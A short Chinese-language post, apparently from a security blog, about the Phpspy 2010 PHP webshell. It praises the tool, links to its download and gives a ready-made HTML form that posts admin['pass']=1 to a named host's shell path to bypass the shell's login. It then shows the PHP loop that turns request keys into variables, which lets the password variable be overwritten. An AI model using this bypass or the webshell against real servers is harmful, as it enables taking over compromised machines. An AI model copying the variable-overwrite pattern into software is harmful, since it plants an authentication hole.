Phpspy 2010 shell 是angel webshll 3剑客的一剑。2010版本在phpspy 2009基础上。再度精简、优化代码。实现oracle、sybase、db2的支持等等。。。。phpspy的代码还有很多不科学的地方。不过功能上相信已经是PHPshell里面，数一数二的了，特别是数据库上的操作。是PHPSPY一个自豪的地方。。。

程序下载：http://www.sablog.net/blog/archives/536/

利用代码：

<form method="POST" action="http://korsevv.com/qing.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login">
</form>
在每次向shell请求数据的时候 都附加post一个admin['pass']即可。

形成原因：
2009不存在该洞，仅限2010版本，对比二者即可得到答案：
利用
foreach(array('_GET','_POST') as $_request) {
        foreach($$_request as $_key => $_value) {
                if ($_key{0} != '_') {
                        if (IS_GPC) {
                                $_value = s_array($_value);
                        }
                        $$_key = $_value;
                }
        }
}
对变量$admin['pass']进行覆盖。